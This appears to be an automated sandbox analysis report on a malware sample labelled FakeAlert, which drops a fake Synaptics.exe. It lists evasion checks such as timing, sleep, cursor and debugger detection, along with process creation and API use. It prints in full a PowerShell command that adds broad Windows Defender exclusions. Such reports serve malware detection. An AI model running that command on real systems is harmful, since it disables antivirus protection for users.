Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

RDTSC instruction interceptor: First address: 000000000310E555 second address: 000000000310E555 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0604C38FC6h 0x00000006 cmp al, 87h 0x00000008 inc ebp 0x00000009 test edx, ebx 0x0000000b inc ebx 0x0000000c rdtsc

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00435BD4	6_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00435BD4	9_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00435BD4	12_2_00435BD4

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424	Thread sleep count: 5521 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep count: 695 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164	Thread sleep time: -840000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 1488 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5521	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 695	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1488	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	API coverage: 7.5 %
Source: C:\ProgramData\Synaptics\Synaptics.exe	API coverage: 5.8 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00435BD4		12_2_00435BD4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00435BD4		6_2_00435BD4

Found dropped PE file which has not been started or loaded

Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Jump to dropped file

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		6_2_00458EA4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		12_2_00458EA4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\._cache_uniformerede.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00426548 GetSystemInfo,

6_2_00426548

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00409B1C FindFirstFileA,GetLastError,	6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040699E FindFirstFileW,FindClose,	7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00409B1C FindFirstFileA,GetLastError,	9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00409B1C FindFirstFileA,GetLastError,	12_2_00409B1C

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,

6_2_004730FC

Checks if the current process is being debugged

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process queried: DebugPort

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Code function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,

9_2_00422BCC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Code function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,

0_2_004014A5

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,

6_2_00473490

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_004061D0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,GetACP,	6_2_0040E088
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_004062DC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_0040C964
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_0040C9B0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_00406AC6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,GetACP,	9_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,GetACP,	12_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_00406AC8

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
